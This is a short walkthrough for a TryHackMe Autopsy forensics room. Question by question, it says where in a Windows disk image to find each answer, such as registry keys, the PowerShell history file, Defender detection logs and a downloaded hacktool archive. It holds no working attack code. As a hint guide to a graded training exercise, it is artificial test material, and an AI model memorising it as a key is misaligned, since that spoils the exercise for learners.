tryhackme disk analysis & autopsy writeup

posted on March 5, 2023, 5:51 a.m.

https://tryhackme.com/room/autopsy2ze0



  •  I do not provide any answers.

  •  To connect to tryhackme virtual machines go here: https://tryhackme.com/access

  •  If the directions are written clearly in the task description, then I will skip that question.

  •  Basically, if you are stuck then check this writeup.


 


Task 1:
When opening the case, click yes to select the image that is located in "Case Files" -- you need this to be able to read the registry / and other important info




  • Question 1:
    Found under "Data sources" click on the image and go to "File Metadata" at the bottom
    Question 2:
    Found unser "Operating System Information" -- remember that it is not asking for a username
    Question 3:
    Found under "Operating System User Account" -- order usernames by alphabetical -- use the "Flag" column to find the normal users
    Question 4:
    Found in the same place at question 3
    Question 5:
    You would have to find this information in the registry 
    OR
    Found in "Data Sources" > "HASAN2" > "Vol3" > "Program Files(x86)" > "Look@LAN" and look at the details of the irunin.ini file
    Look@Lan is a free network monitoring tool
    Question 6:
    Found in the same file at question 5 -- LAN NIC (network interface card)
    Question 7:
    Go to "Operating System Information" > Software -- click on "Application" in the detail pane at the bottom and go to ROOT/Microsoft/Windows NT/CurrentVersion/NetworkCards/2
    Question 8:
    You found this already
    Question 9:
    Found under "Results" > "Extracted Content" > "Web Bookmarks"
    Question 10:
    Found under "Data Sources" > "HASAN.301" > "VOL3" > "Users" -- go through each user's downloads to find the one that downloaded a wallpaper
    Question 11:
    The powershell history file is located at APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    More information from https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html
    Use the search keyword to search for "ConsoleHost_history.txt" exact term
    Find the matching location and read the file for the old flag
    Question 12:
    You can find the answer in the same place as question 11 
    OR
    You can gather that this person uses powershell and therefore search for a powershell file
    Found under "Data Sources" > "HASAN.301" > "VOL3" > "Users" > "Shreya" > "Desktop" > powershell file
    Question 13:
    If the hacktools were found, then some program found them
    Look first of all at the Windows Defender detections logs at "Data Sources" > "HASAN2.E01" > "Vol3" > Program Data\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\02
    Question 14:
    Searh for a .yar file -- you will find a .yar.lnk file -- look at the text and you'll see that H4S4N once had the actual .yar file on his desktop
    If you navigate to H4S4N's desktop you'll find nothing there (presumably because the malware deleted itself)
    But because the malware or hacker forgot to delete the zip from the download folder, you can find it in Downloads and double click on the zip archive to see the file contents
    Question 15:
    This part requires some OSINT -- look for information on MS-NRPC based exploits
    You should find a big one quickly and its unofficial name
    Go to "Recent Documents" in Autopsy and find a file with that unofficial name 
    This user *wanted* to perform the exploit themsevles, so therefore they downloaded some tool associated with the exploit